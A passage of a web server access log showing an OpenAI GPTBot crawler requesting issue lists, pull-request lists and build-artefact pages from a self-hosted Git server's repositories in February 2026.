"https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:19:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx?display=rendered" [Client 74.7.227.38] [Length 11212] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:19:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" -[17/Feb/2026:19:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=open&type=all" -[17/Feb/2026:19:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:19:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11752] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:19:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11319] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:19:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:19:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11318] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:19:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11750] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:19:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11672] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:19:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11385] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:19:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:19:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16075] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:19:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11670] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:19:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:19:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11386] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:19:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16076] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:19:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11098] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:19:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72053] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 122747] [Gzip 7.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:31:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:31:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:31:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=latest&state=all&type=all" -[17/Feb/2026:19:31:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:31:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:31:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:31:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:31:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:31:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:31:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:31:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11214] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:19:31:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11215] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:19:31:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj?display=rendered" [Client 74.7.227.38] [Length 11142] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 